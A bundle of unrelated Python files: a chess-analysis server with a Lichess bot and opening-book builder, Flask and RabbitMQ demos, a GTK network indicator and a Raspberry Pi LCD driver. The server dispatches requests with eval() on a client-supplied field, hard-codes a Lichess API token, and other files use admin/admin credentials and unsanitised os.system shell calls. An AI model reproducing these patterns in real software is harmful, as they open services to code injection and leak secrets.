def delete(req):
log(f"< deleted < {req.id} > >", "info")
study = getstudy(req)
study.delete()
storestudy(req, study)
return {
"kind": "deletedone",
"setstudy": study.toblob(nodelist = True)
}
def tobegin(req):
log(f"< tobegin < {req.id} > >", "info")
study = getstudy(req)
study.tobegin()
storestudy(req, study)
return {
"kind": "tobegindone",
"setstudy": study.toblob(nodelist = True)
}
def forward(req):
log(f"< forward < {req.id} > >", "info")
study = getstudy(req)
study.forward()
storestudy(req, study)
return {
"kind": "forwarddone",
"setstudy": study.toblob(nodelist = True)
}
def toend(req):
log(f"< toend < {req.id} > >", "info")
study = getstudy(req)
study.toend()
storestudy(req, study)
return {
"kind": "toenddone",
"setstudy": study.toblob(nodelist = True)
}
def importstudy(req):
usercode = req.queryparams["usercode"]
studyid = req.queryparams["studyid"]
nodeid = req.queryparams["nodeid"]
uid = decryptalphanum(usercode)
log(f"< importing study < {usercode} | {uid} | {studyid} | {nodeid} > >", "info")
userpath = "users/" + uid
if not db.getpath(userpath):
log(f"< import user does not exist < {uid} > >", "error")
return
studypath = userpath + "/studies/" + studyid
studyblob = db.getpath(studypath)
if not studyblob:
log(f"< import study does not exist < {studyid} > >", "error")
return
if uid == req.user.uid:
log(f"< importing own study < {uid} | {nodeid} > >", "warning")
req.id = studyid
selectstudy(req, nodeid = nodeid)
return
log(f"< importing study < {studyid} | {nodeid} > >", "info")
study = Study(studyblob)
req.id = studyid
storestudy(req, study)
selectstudy(req, nodeid = nodeid)
def enginecommand(req):
global mainengine
if req.user.can("analyze"):
mainengine.send_line(req.command)
return {
"kind": "enginecommandissued"
}
else:
return {
"kind": "enginecommandfailed",
"status": "not authorized"
}
def analyze(req):
global mainengine
if req.user.can("analyze") or FREE_ANALYSIS():
mainengine.analyze(AnalyzeJob(req.fen, multipv = req.multipv, variantkey = req.variantkey))
return {
"kind": "analyzestarted"
}
else:
return {
"kind": "analyzefailed",
"status": "not authorized"
}
def stopanalyze(req):
global mainengine
if req.user.can("analyze") or FREE_ANALYSIS():
mainengine.stopanalyze()
return {
"kind": "analyzestopped"
}
else:
return {
"kind": "stopanalyzefailed",
"status": "not authorized"
}
def newengine(req):
if req.user.can("analyze"):
newengine_func()
return {
"kind": "newenginedone"
}
else:
return {
"kind": "newenginefailed",
"status": "not authorized"
}
def getanalysisinfo(req):
fdbpath = f"analysisinfo/{req.variantkey}/{req.zobristkeyhex}"
log(f"< getting analysis info < {fdbpath} > >", "info")
blob = read_json_from_fdb(fdbpath, None)
return {
"kind": "analysisinfo",
"blob": blob
}
def getanalysisbook(req):
fdbpath = f"analysisbook/{req.variantkey}/{req.zobristkeyhex}"
log(f"< getting analysis book < {fdbpath} > >", "info")
blob = read_json_from_fdb(fdbpath, None)
return {
"kind": "analysisbook",
"zobristkeyhex": req.zobristkeyhex,
"blob": blob
}
def saveanalysisbook(req):
if req.user.can("admin"):
fdbpath = f"analysisbook/{req.variantkey}/{req.zobristkeyhex}"
log(f"< saving analysis book < {fdbpath} > >", "info")
write_json_to_fdb(fdbpath, req.blob)
return {
"kind": "analysisbooksaved"
}
else:
return {
"kind": "saveanalysisbookfailed",
"status": "not authorized"
}
def reloadanalysisbook(req):
global bot
if req.user.can("admin"):
log(f"< reload analysis book >", "info")
bot.loadanalysisbook()
return {
"kind": "analysisbookreloaded"
}
else:
return {
"kind": "reloadnalysisbookfailed",
"status": "not authorized"
}
def challenge(req):
global bot
if req.user.can("admin"):
log(f"< challenge | {req.username} | {req.initial} | {req.increment} | {req.rated} | {req.color} >", "info")
status = bot.challenge(req.username, req.initial, req.increment, req.rated, req.color)
print("challenge status", status)
return {
"kind": "challengeissued",
"status": status
}
else:
return {
"kind": "challengefailed",
"status": "not authorized"
}
###################################################################
def jsonapi(reqobj):
req = Req(reqobj)
try:
resobj = eval(f"{req.kind}(req)")
except:
pe()
resobj = {
"kind": "unknownapirequest"
}
return req.res(resobj)
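# Dispatch sketch (the request payload below is made up): jsonapi() resolves the
# handler by evaluating "<kind>(req)", so the "kind" field must match one of the
# handler function names defined above and is therefore trusted input.
#
#   jsonapi({"kind": "login", "verifyusername": "someuser", "user": {...}})
#     -> login(req) -> {"kind": "login", "user": {...}}
#
# An unknown kind (or a handler exception) falls through to
# {"kind": "unknownapirequest"}.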
###################################################################
TOKEN = "L8GHblP1Wc57Oegi"
def ndjsonpath(player):
return f"{player}_ndjson"
def nowms():
return int(time.time() * 1000)
def gameexporturl(player, since = 0, until = None, max = MAX_DOWNLOAD_GAMES):
if not until:
until = nowms()
return f"https://lichess.org//api/games/user/{player}?variant=atomic&max={max}&since={since}&until={until}"
def prefilterok(g):
if not g.perf == "atomic":
return False
if ( g.white.rating < PRE_MIN_RATING ) or ( g.black.rating < PRE_MIN_RATING ):
return False
if g.playeropp.ailevel or ( g.playeropp.title == "BOT" ):
return False
if len(g.moves) < PRE_MIN_PLIES:
return False
if not g.rated:
return False
return True
def rationalizeplayerdata(ndjson):
#print("rationalizing player data", len(ndjson))
ids = {}
filtered = []
for obj in ndjson:
if ( "id" in obj ) and ( "lastMoveAt" in obj ) and ( "createdAt" in obj ):
id = obj["id"]
if not id in ids:
ids[id] = True
filtered.append(obj)
else:
print("duplicate id", id)
filtered.sort(key = lambda x: x["lastMoveAt"], reverse = True)
if len(filtered) > MAX_NDJSON_SIZE:
filtered = filtered[:MAX_NDJSON_SIZE]
#print("rationalized player data", len(filtered))
return filtered
def exportgames(kind, playerndjson):
print("export", kind, playerndjson)
if ( kind == "old" ) and ( len(playerndjson.ndjson) >= MAX_NDJSON_SIZE ):
#print("cache full, not exporting")
return
since = playerndjson.since
until = playerndjson.until
max = MAX_DOWNLOAD_GAMES
if kind == "new":
until = nowms()
if playerndjson.since > 0:
max = 10 * max
if kind == "old":
since = 0
until = playerndjson.until
#print("exporting", since, until, max)
r = requests.get(gameexporturl(playerndjson.player, since = since, until = until, max = max), headers = {
"Authorization": f"Bearer {TOKEN}",
"Accept": "application/x-ndjson"
}, stream = True)
cnt = 0
found = 0
start = time.time()
for line in r.iter_lines():
try:
line = line.decode("utf-8")
obj = json.loads(line)
cnt += 1
if ( "createdAt" in obj ) and ( "lastMoveAt" in obj ):
createdat = obj["createdAt"]
if createdat < playerndjson.until:
playerndjson.until = createdat
g = LichessGame(obj, playerndjson.player)
if(prefilterok(g)):
playerndjson.ndjson.append(obj)
found += 1
if g.lastmoveat > playerndjson.since:
playerndjson.since = g.lastmoveat
if ( cnt % 20 ) == 0:
print("read cnt", cnt, "found", found, "rate", cnt / (time.time() - start))
except:
print("problem loading games")
if found > 0:
#print("writing player", playerndjson.player)
playerndjson.ndjson = rationalizeplayerdata(playerndjson.ndjson)
else:
#print("up to date", playerndjson.player)
pass
playerndjson.storedb()
def bookfilterok(g):
return ( g.white.rating >= BOOK_MIN_RATING ) and ( g.black.rating >= BOOK_MIN_RATING )
def bookpath(player):
return f"{player}_book"
class PlayerNdjson:
def __init__(self, player, blob = {}):
self.fromblob(player, blob)
def fromblob(self, player, blob = {}):
self.player = player
self.filterversion = blob.get("filterversion", 0)
self.ndjson = blob.get("ndjson", [])
self.since = blob.get("since", 0)
self.until = blob.get("until", nowms())
def fromdb(self):
blob = read_json_from_fdb(ndjsonpath(self.player), {})
self.fromblob(self.player, blob)
return self
def toblob(self):
return {
"player": self.player,
"filterversion": self.filterversion,
"since": self.since,
"until": self.until,
"ndjson": self.ndjson
}
def storedb(self):
#print("storing ndjson", self)
write_json_to_fdb(ndjsonpath(self.player), self.toblob())
return self
def __repr__(self):
return f"< player ndjson < {self.player} since {self.since} until {self.until} size {len(self.ndjson)} > >"
def buildplayerbook(player, force = False):
defaultbookblob = {
"name": player
}
bookblob = read_json_from_fdb(bookpath(player), defaultbookblob)
book = Book(bookblob)
if ( BOOK_FILTER_VERSION > book.filterversion ) or force:
book.gameids = {}
book.positions = {}
book.filterversion = BOOK_FILTER_VERSION
playerndjson = PlayerNdjson(player).fromdb()
ndjson = playerndjson.ndjson
#print("building", player)
cnt = 0
found = 0
filtered = []
for gameblob in ndjson:
cnt += 1
g = LichessGame(gameblob, player)
if bookfilterok(g):
filtered.append(g)
found += 1
if ( cnt % 1000 ) == 0:
#print("filtering", cnt, "found", found)
pass
#print("filtering done, found", found)
if len(filtered) > MAX_BOOK_GAMES:
filtered = filtered[:MAX_BOOK_GAMES]
cnt = 0
for g in filtered:
cnt += 1
#print("building", cnt, "of", len(filtered), g.white.name, g.black.name)
if g.id in book.gameids:
pass
#print("up to date")
else:
book.gameids[g.id] = True
board = getvariantboard("atomic")
zkh = get_zobrist_key_hex(board)
movecnt = 0
for san in g.moves:
move = board.parse_san(san)
if movecnt >= MAX_BOOK_PLIES:
break
movecnt += 1
uci = move.uci()
if zkh in book.positions:
pos = book.positions[zkh]
else:
pos = BookPosition({
"zobristkeyhex": zkh
})
if uci in pos.moves:
bookmove = pos.moves[uci]
else:
bookmove = BookMove({
"uci": uci,
"san": san
})
if board.turn == g.mecolor:
bookmove.plays += 1
if g.meresult == 1:
bookmove.wins += 1
elif g.meresult == 0:
bookmove.losses += 1
else:
bookmove.draws += 1
pos.moves[uci] = bookmove
pos.addtopgame(g.excerpt())
book.positions[zkh] = pos
board.push(move)
zkh = get_zobrist_key_hex(board)
print("added", movecnt, "moves of", g.white.name, g.black.name)
write_json_to_fdb(bookpath(player), book.toblob())
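# Resulting book layout (sketch): book.positions maps a zobrist key hex string to
# a BookPosition whose moves dict maps a uci string to a BookMove carrying
# plays/wins/draws/losses counters for the scanned player, plus a few excerpt
# games per position added via addtopgame().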
def buildbooks():
BUILD_PLAYERS = SCAN_PLAYER_LIST.split(",")
for player in BUILD_PLAYERS:
buildplayerbook(player)
time.sleep(5)
def scanplayerstarget():
SCAN_PLAYERS = SCAN_PLAYER_LIST.split(",")
#print("scan", SCAN_PLAYERS)
while True:
for player in SCAN_PLAYERS:
#print("scanning", player)
playerndjson = PlayerNdjson(player).fromdb()
if PRE_FILTER_VERSION > playerndjson.filterversion:
#print("rebuild ndjson")
playerndjson.filterversion = PRE_FILTER_VERSION
playerndjson.ndjson = []
playerndjson.ndjson = rationalizeplayerdata(playerndjson.ndjson)
exportgames("new", playerndjson)
exportgames("old", playerndjson)
time.sleep(5)
buildbooks()
time.sleep(BUILD_BOOK_DELAY)
###################################################################
def keepalivetarget():
for i in range(KEEP_ALIVE):
time.sleep(600)
geturl(SERVER_URL, verbose = False)
###################################################################
def enginetesttarget():
time.sleep(5)
sl = SystemLog()
e = UciEngine(ENGINE_WORKING_DIR(), ENGINE_EXECUTABLE_NAME(), "mainengine", sl)
e.open()
time.sleep(5)
e.send_line("uci")
time.sleep(5)
e.kill()
print(sl)
def initenginetarget():
global mainengine
#print("initializing engine")
newengine_func()
#print("initializing engine done")
class Bot:
def challenge(self, username, initial, increment, rated, color):
ratedstr = "true"
if not rated:
ratedstr = "false"
fields = {
"variant": self.variant,
"clock.limit": str(initial),
"clock.increment": str(increment),
"rated": ratedstr,
"color": color
}
print("making challenge", fields)
res = posturl(f"https://lichess.org//api/challenge/{username}", asjson = True, headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/json"
}, fields = fields)
return res
def newengine(self):
if self.engine:
self.engine.kill()
self.engine = UciEngine(ENGINE_WORKING_DIR(), ENGINE_EXECUTABLE_NAME(), "botengine", None)
self.engine.open()
def __init__(self, token = os.environ.get("BOTTOKEN", None), username = os.environ.get("BOTUSERNAME", "AtomicVsEngineBot"), variant = "atomic"):
self.token = token
if not self.token:
print("no bot token")
return
self.username = username
self.variant = variant
self.analysisbook = None
self.playing = False
self.gameticks = {}
self.engine = None
self.newengine()
self.loadanalysisbook()
Thread(target = self.streameventstarget).start()
def loadanalysisbook(self):
self.analysisbook = fdb.reference(f"analysisbook/{self.variant}").get()
if self.analysisbook:
#print("analysis book loaded", len(list(self.analysisbook.keys())), "position(s)")
pass
def monitoreventstreamtarget(self, r):
while True:
if ( time.time() - self.lasttick ) > 30:
print("event stream timeout")
r.close()
return
time.sleep(10)
def challengeaction(self, kind, id):
print(kind, "challenge", id)
res = posturl(f"https://lichess.org//api/challenge/{id}/{kind}", asjson = True, headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/json"
})
print(kind, "challenge response", res)
def getbookmove(self, board):
try:
zkh = get_zobrist_key_hex(board)
if zkh in self.analysisbook:
posblob = json.loads(self.analysisbook[zkh])
if "movesblob" in posblob:
movesblob = posblob["movesblob"]
ucilist = []
for moveblob in movesblob:
for i in range(int(moveblob["weight"])):
ucilist.append(moveblob["uci"])
index = random.randint(0, len(ucilist) - 1)
seluci = ucilist[index]
return seluci
else:
return None
else:
return None
except:
print("problem finding book move")
return None
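# Weighting sketch (the moveblob contents are made up): getbookmove() repeats each
# uci "weight" times before picking uniformly, so with
#
#   movesblob = [{"uci": "e2e4", "weight": 3}, {"uci": "d2d4", "weight": 1}]
#
# e2e4 is returned with probability 3/4 and d2d4 with probability 1/4.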
def makemove(self, gameid, uci):
#print("making move", gameid, uci)
res = posturl(f"https://lichess.org//api/bot/game/{gameid}/move/{uci}", asjson = True, headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/json"
})
print("make move response", res)
def getenginemove(self, board, initialboard, moves = [], timecontrol = None, ponder = None):
legalmoves = board.legal_moves
if len(list(legalmoves)) == 0:
print("no legal moves")
return ( None, None )
ponderok = False
if len(moves) > 0:
if moves[-1] == ponder:
ponderok = True
print("ponder ok")
moveoverhead = 0
if timecontrol:
mytime = timecontrol.wtime
if self.color == chess.BLACK:
mytime = timecontrol.btime
if mytime < 30000:
moveoverhead = int(os.environ.get("MOVEOVERHEAD", 1500))
self.engine.setoption("Move Overhead", moveoverhead)
enginestarted = time.time()
if ponderok:
( bestmove, ponder ) = self.engine.awaitponder()
else:
self.engine.doanalyze(AnalyzeJob(fen = initialboard.fen(), moves = moves, multipv = 1, variantkey = self.variant, timecontrol = timecontrol))
if not timecontrol:
print("waiting for move")
time.sleep(2)
self.engine.stop()
else:
pass
( bestmove, ponder ) = self.engine.awaitbestmove()
elapsed = time.time() - enginestarted
if timecontrol:
if self.color == chess.WHITE:
timecontrol.wtime -= int(elapsed * 1000)
if timecontrol.wtime < 0:
timecontrol.wtime = 50
else:
timecontrol.btime -= int(elapsed * 1000)
if timecontrol.btime < 0:
timecontrol.btime = 50
if ponder:
moves.append(bestmove)
moves.append(ponder)
self.engine.doanalyze(AnalyzeJob(fen = initialboard.fen(), moves = moves, multipv = 1, variantkey = self.variant, timecontrol = timecontrol), ponder = True)
return ( bestmove, ponder )
def monitorplaygametarget(self, r, gameid):
while True:
if ( time.time() - self.gameticks[gameid] ) > 30:
print("play game timeout", gameid)
r.close()
return
time.sleep(10)
def playgame(self, event):
print("playing game", event)
self.playing = True
self.ponder = None
try:
game = event["game"]
gameid = game["id"]
r = requests.get(f"https://lichess.org//api/bot/game/stream/{gameid}", headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/x-ndjson"
}, stream = True)
self.gameticks[gameid] = time.time()
Thread(target = self.monitorplaygametarget, args = (r, gameid)).start()
try:
for line in r.iter_lines():
try:
line = line.decode("utf-8")
self.gameticks[gameid] = time.time()
self.lasttick = time.time()
event = json.loads(line)
kind = event["type"]
if kind == "gameFull":
self.initialfen = event["initialFen"]
self.initialboard = getvariantboard(self.variant)
if not ( self.initialfen == "startpos" ):
self.initialboard.set_fen(self.initialfen)
self.whiteid = event["white"]["id"]
self.blackid = event["black"]["id"]
if self.whiteid == self.username.lower():
self.color = chess.WHITE
elif self.blackid == self.username.lower():
self.color = chess.BLACK
else:
print("could not find bot color")
break
print("game started", self.whiteid, self.blackid, self.color, self.initialfen)
if ( kind == "gameFull" ) or ( kind == "gameState" ):
try:
if kind == "gameFull":
state = event["state"]
else:
state = event
movesstr = state["moves"]
moves = []
if len(movesstr) > 0:
moves = movesstr.split(" ")
board = self.initialboard.copy()
for uci in moves:
move = chess.Move.from_uci(uci)
board.push(move)
if board.turn == self.color:
bookmove = self.getbookmove(board)
if bookmove:
print("making book move", bookmove)
self.makemove(gameid, bookmove)
self.engine.stop()
self.ponder = None
else:
timecontrol = TimeControl(state["wtime"], state["winc"], state["btime"], state["binc"])
( enginemove, ponder ) = self.getenginemove(board, self.initialboard, moves, timecontrol, self.ponder)
self.ponder = ponder
if enginemove:
print("making engine move", enginemove, "ponder", ponder)
self.makemove(gameid, enginemove)
else:
print("no engine move")
break
except:
print("probblem processing game state event")
pe()
except:
pass
except:
print("stream game exception")
except:
print("problem playing game")
print("finished playing game")
self.engine.stop()
self.playing = False
def streameventstarget(self):
while True:
try:
#print("opening event stream")
r = requests.get("https://lichess.org//api/stream/event", headers = {
"Authorization": f"Bearer {self.token}",
"Accept": "application/x-ndjson"
}, stream = True)
self.lasttick = time.time()
Thread(target = self.monitoreventstreamtarget, args = (r,)).start()
try:
for line in r.iter_lines():
line = line.decode("utf-8")
try:
event = json.loads(line)
print("bot", json.dumps(event, indent = 2))
try:
kind = event["type"]
if kind == "challenge":
print("incoming challenge")
challenge = event["challenge"]
id = challenge["id"]
challenger = challenge["challenger"]
variant = challenge["variant"]["key"]
speed = challenge["speed"]
if challenger["title"] == "BOT":
print("not accepting bot challenge")
self.challengeaction("decline", id)
elif not ( variant == self.variant ):
print("not accepting variant", variant)
self.challengeaction("decline", id)
elif not ( ( speed == "bullet" ) or ( speed == "blitz" ) ):
print("not accepting speed", speed)
self.challengeaction("decline", id)
elif self.playing:
print("not accepting challenge while playing")
self.challengeaction("decline", id)
else:
print("accepting challenge")
self.challengeaction("accept", id)
elif kind == "gameStart":
self.playgame(event)
except:
print("bot event exception")
except:
self.lasttick = time.time()
except:
print("event stream exception")
print("event stream closed")
except:
print("could no open event stream")
time.sleep(60)
###################################################################
def cleanplayers():
for player in SCAN_PLAYER_LIST.split(","):
print("cleaning player", player)
delfdb(ndjsonpath(player))
delfdb(bookpath(player))
#cleanplayers()
if IS_PROD() and False:
Thread(target = scanplayerstarget).start()
Thread(target = keepalivetarget).start()
#Thread(target = enginetesttarget).start()
Thread(target = initenginetarget).start()
bot = Bot()
#print("serverlogic started, prod", IS_PROD())
#buildplayerbook("sefulesefarka", force = True)
###################################################################
def loadbook(req):
log(f"< load book < {req.player} > >", "info")
bookblob = read_json_from_fdb(bookpath(req.player), None)
return {
"kind": "loadbook",
"bookblob": bookblob
}
|
routes.py
|
from flask import Flask, render_template
from time import sleep
import threading
def waitfn(arg):
for i in range(arg):
with open('foo.txt', 'a') as f:
f.write("i {0}\n".format(i))
sleep(2)
app = Flask(__name__)
@app.route('/')
def home():
return render_template('home.html')
@app.route('/about')
def about():
return render_template('about.html')
def run_server():
thread = threading.Thread(target=waitfn, args=(10, ))
thread.start()
app.run(debug=True, use_reloader=False)
thread.join()
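# Note: use_reloader=False matters here. With the reloader enabled Flask re-runs
# the module in a child process, which would start a second waitfn thread writing
# to foo.txt.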
if __name__ == '__main__':
run_server()
|
pika_route.py
|
import random
import threading
import pika
"""
Summary: direct exchange routing demo - send() publishes messages with routing keys 'info'/'error'/'warn'; recv() binds one exclusive queue to all three keys and consumes them.
"""
def send():
tag = random.choice(['info', 'error', 'warn'])
rb_conn = pika.BlockingConnection(pika.ConnectionParameters(host='192.168.101.129',
port=5672,
virtual_host='/',
credentials=pika.PlainCredentials(username='admin',
password='admin')),
)
ch = rb_conn.channel()
ch.exchange_declare(exchange='direct_logs', exchange_type='direct') # create direct exchange
# message payload to publish
msg = b"hello world"
for n in range(100):
for tag in ['info', 'error', 'warn']:
ch.basic_publish(exchange="direct_logs",
routing_key=tag,
body=msg)  # publish the message to the exchange
ch.close()
print('send over')
def recv():
rb_conn = pika.BlockingConnection(pika.ConnectionParameters(host='192.168.101.129',
port=5672,
virtual_host='/',
credentials=pika.PlainCredentials(username='admin',
password='admin')),
)
ch = rb_conn.channel()
ch.exchange_declare('direct_logs', exchange_type='direct')
def callback(ch, method, p, msg):
print(threading.get_ident(), '---', method.routing_key, '---', msg)
queue = ch.queue_declare(queue='', exclusive=True)
queue_name = queue.method.queue
for tag in ['info', 'error', 'warn']:
ch.queue_bind(exchange='direct_logs', queue=queue_name, routing_key=tag)
ch.basic_consume(
queue=queue_name,
on_message_callback=callback,
auto_ack=True
)
ch.start_consuming()
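# Because the same anonymous exclusive queue is bound to the direct exchange with
# all three routing keys ('info', 'error', 'warn'), this consumer receives every
# message published by send(); binding fewer keys would filter by severity instead.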
if __name__ == '__main__':
rv = threading.Thread(target=recv)
rv.start()
send()
rv.join()
|
indicator.py
|
#!/bin/env python
# -*- coding: utf-8 -*-
"""Indicator."""
import os
import subprocess
import signal
import json
import gi
import time
from threading import Thread
from urllib2 import Request, urlopen
gi.require_version("Gtk", "3.0")
gi.require_version('AppIndicator3', '0.1')
gi.require_version('Notify', '0.7')
from utilities.dialog import DialogWindow
from gi.repository import Gtk
from gi.repository import AppIndicator3
from gi.repository import GObject
from gi.repository import Notify
APPINDICATOR_ID = 'myappindicator'
global indicator
global menu
global item_download
def main():
"""Main."""
global indicator
indicator = AppIndicator3.Indicator.new(
APPINDICATOR_ID,
'/home/shri/Documents/My/python/kivy/indicator/icons/Git_icon.svg.png',
AppIndicator3.IndicatorCategory.SYSTEM_SERVICES
)
indicator.set_status(AppIndicator3.IndicatorStatus.ACTIVE)
indicator.set_menu(build_menu())
update = Thread(target=net_speed)
# daemonize the thread to make the indicator stoppable
update.setDaemon(True)
update.start()
Notify.init(APPINDICATOR_ID)
GObject.threads_init()
signal.signal(signal.SIGINT, signal.SIG_DFL)
Gtk.main()
def build_menu(downloads=None):
"""Build menu"""
global menu
global item_download
menu = Gtk.Menu()
item_joke = Gtk.MenuItem('Joke')
item_joke.connect('activate', joke)
menu.append(item_joke)
bench = Gtk.MenuItem('Create Menu')
bench.connect('activate', create_menu)
menu.append(bench)
item_download = Gtk.MenuItem("downloads")
item_download.connect('activate', joke)
menu.append(item_download)
item_download.show()
try:
with open('data', 'a+') as outfile:
menu_items = json.load(outfile)
except ValueError as e:
print(e)
pass
else:
for menu_item in menu_items:
new_item = Gtk.MenuItem(menu_item['menu'])
new_item.connect('activate', create_command)
menu.append(new_item)
new_item.show()
menu_sep = Gtk.SeparatorMenuItem()
menu.append(menu_sep)
item_quit = Gtk.MenuItem('Quit')
item_quit.connect('activate', quit)
menu.append(item_quit)
# img = Gtk.Image()
# img.set_from_file('/home/shri/Documents/My/python/kivy/indicator/icons/Git_icon.svg.png')
# new = Gtk.ImageMenuItem(Gtk.STOCK_NEW, 'New')
# new.set_image(img)
# new.set_always_show_image(True)
# menu.append(new)
menu.show_all()
return menu
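# Assumed layout of the local 'data' file read above and in create_command()
# (the entries themselves are made up; only the "menu" and "command" keys are
# used by the code):
#
#   [
#     {"menu": "Start bench", "command": "cd ~/frappe-bench && bench start"},
#     {"menu": "Htop", "command": "htop"}
#   ]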
def create_command(_):
"""Create command."""
lable = _.get_label()
with open('data') as outfile:
menu_items = json.load(outfile)
for menu_item in menu_items:
if lable == menu_item['menu']:
print menu_item['command']
command = """gnome-terminal -e 'bash -c
\"{}; bash\" '""".format(menu_item['command'])
status = os.system(command)
if status == 0:
title = "<b>{}</b>".format(lable)
message = "Command {} executed.".format(menu_item['command'])
Notify.Notification.new(
title,
message,
icon=os.path.abspath('icons/frappe.png')
).show()
break
def fetch_joke():
"""Fetch jokes"""
request = Request('http://api.icndb.com/jokes/random?limitTo=[nerdy]')
response = urlopen(request)
joke = json.loads(response.read())['value']['joke']
return joke
def joke(_):
"""Notify joke."""
Notify.Notification.new("<b>Joke</b>", fetch_joke(), None).show()
def create_menu(_):
"""Start frappe bench."""
win = DialogWindow()
win.show_all()
print _.get_label()
# status = os.system("""gnome-terminal -e 'bash -c
# \"cd /home/shri/frappe-bench && bench start; bash\" '""")
# if status == 0:
# Notify.Notification.new(
# "<b>Frappe</b>",
# "Frappe Started",
# icon='/home/shri/Documents/My/python/kivy/indicator/icons/frappe.png'
# ).show()
def net_speed():
"""Net speed."""
global indicator
global item_download
while True:
try:
net_type = shell_command("route -n | awk 'FNR == 3 {print $8}'")
rx_bytes_command = "cat /sys/class/net/{}/statistics/rx_bytes".format(
net_type
)
tx_bytes_command = "cat /sys/class/net/{}/statistics/tx_bytes".format(
net_type
)
rx_bytes_1 = int(shell_command(rx_bytes_command))
tx_bytes_1 = int(shell_command(tx_bytes_command))
time.sleep(1)
rx_bytes_2 = int(shell_command(rx_bytes_command))
tx_bytes_2 = int(shell_command(tx_bytes_command))
upload_bytes = tx_bytes_2 - tx_bytes_1
if upload_bytes < 1024:
uploads = "{}bytes/s".format(upload_bytes)
if upload_bytes >= 1024:
upload_bytes = upload_bytes // 1024
uploads = "{}KiB/s".format(upload_bytes)
if upload_bytes >= 1024:
upload_bytes = upload_bytes // 1024
uploads = "{}mb/s".format(upload_bytes // 1024)
download_bytes = rx_bytes_2 - rx_bytes_1
if download_bytes < 1024:
downloads = "{}bytes/s".format(download_bytes)
if download_bytes >= 1024:
download_bytes = download_bytes // 1024
downloads = "{}KiB/s".format(download_bytes)
if download_bytes >= 1024:
download_bytes = download_bytes // 1024
downloads = "{}mb/s".format(download_bytes // 1024)
message = "dl: {}".format(downloads)
GObject.idle_add(
indicator.set_label,
message, APPINDICATOR_ID,
priority=GObject.PRIORITY_DEFAULT
)
# item_download = Gtk.MenuItem(downloads)
# item_download.connect('activate', quit)
# menu.append(item_download)
item_download.get_child().set_text("up: {0}".format(uploads))
item_download.show()
except ValueError as e:
print e
time.sleep(2)
message = "up: {0}kbps".format(0)
GObject.idle_add(
indicator.set_label,
message, APPINDICATOR_ID,
priority=GObject.PRIORITY_DEFAULT
)
set_icon(0, 0)
else:
set_icon(upload_bytes, download_bytes)
def set_icon(upload, download):
"""Set icon."""
global indicator
if upload == 0 and download == 0:
icon = os.path.abspath('icons/gnome-netstatus-idle.svg')
elif upload == 0:
icon = os.path.abspath('icons/gnome-netstatus-rx.svg')
elif download == 0:
icon = os.path.abspath('icons/gnome-netstatus-tx.svg')
else:
icon = os.path.abspath('icons/gnome-netstatus-rx-tx.svg')
indicator.set_icon_full(icon, "")
def shell_command(cmd):
"""Run shell command."""
try:
response = subprocess.Popen(
cmd,
shell=True, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
).stdout.read()
except ValueError as e:
raise e
return response.rstrip('\n')
def quit(_):
"""Quit."""
Notify.uninit()
Gtk.main_quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_DFL)
main()
|
raspberrySpyLcd.py
|
#!/usr/bin/python
#
# HD44780 LCD Test Script for
# Raspberry Pi
#
# Author : Matt Hawkins, refactored into class with scrolling support
# Site : http://www.raspberrypi-spy.co.uk
#
# Date : 26/07/2012
# - updated for 4x20 originally did 2x16
import os
import sys
import syslog
import threading
import RPi.GPIO as GPIO
import time
class raspberrySpyLcd:
def __init__(self,backlightTimeout=5):
# The wiring for the LCD is as follows:
# 1 : GND
# 2 : 5V
# 3 : Contrast (0-5V)*
# 4 : RS (Register Select)
# 5 : R/W (Read Write) - GROUND THIS PIN
# 6 : Enable or Strobe
# 7 : Data Bit 0 - NOT USED
# 8 : Data Bit 1 - NOT USED
# 9 : Data Bit 2 - NOT USED
# 10: Data Bit 3 - NOT USED
# 11: Data Bit 4
# 12: Data Bit 5
# 13: Data Bit 6
# 14: Data Bit 7
# 15: LCD Backlight +5V**
# 16: LCD Backlight GND
GPIO.setwarnings(False)
self.dbg=1
# Define GPIO to LCD mapping
self.LCD_RS = 7 # 26 #7
self.LCD_E = 8 #24 #8
self.LCD_D4 = 25 # 22 #25
self.LCD_D5 = 24 # 18 #24
self.LCD_D6 = 23 # 16 #23
self.LCD_D7 = 18 # 12 #18
# Define some device constants
self.LCD_WIDTH = 20 # Maximum characters per line
self.LCD_CHR = True
self.LCD_CMD = False
self.LCD_LINE_1 = 0x80 # LCD RAM address for the 1st line
self.LCD_LINE_2 = 0xC0 # LCD RAM address for the 2nd line
self.LCD_LINE_3 = 0x94
self.LCD_LINE_4 = 0xD4
self.lines=[self.LCD_LINE_1,self.LCD_LINE_2,self.LCD_LINE_3,self.LCD_LINE_4]
# Timing constants
self.E_PULSE = 0.00005 # enable pulse width (50 microseconds)
self.E_DELAY = 0.00005 # settle delay around the enable pulse (50 microseconds)
# Backlight PI
self.LCD_BACKLIGHT= 11 #transistor
self.LCD_BACKLIGHT_TRIGGER_1 = 9
self.LCD_BACKLIGHT_TRIGGER_2 = 10
self.LCD_BACKLIGHT_TRIGGER_3 = 22#17
self.LCD_BACKLIGHT_TRIGGER_4 = 27#17
self.LCD_BACKLIGHT_TRIGGER_5 = 17#17
self.backlightTimeout=backlightTimeout
self.backlightTimer=self.backlightTimeout+time.time()
self.backlight=False
GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbering rather than physical board pin numbers
GPIO.setup(self.LCD_E, GPIO.OUT) # E
GPIO.setup(self.LCD_RS, GPIO.OUT) # RS
GPIO.setup(self.LCD_D4, GPIO.OUT) # DB4
GPIO.setup(self.LCD_D5, GPIO.OUT) # DB5
GPIO.setup(self.LCD_D6, GPIO.OUT) # DB6
GPIO.setup(self.LCD_D7, GPIO.OUT) # DB7
if self.LCD_BACKLIGHT:
GPIO.setup(self.LCD_BACKLIGHT, GPIO.OUT) # backlight transistor pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_1, GPIO.IN,pull_up_down=GPIO.PUD_UP) # backlight trigger pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_2, GPIO.IN,pull_up_down=GPIO.PUD_UP) # backlight trigger pin
GPIO.setup(self.LCD_BACKLIGHT_TRIGGER_3, GPIO.IN, pull_up_down=GPIO.PUD_UP) # backlight trigger pin
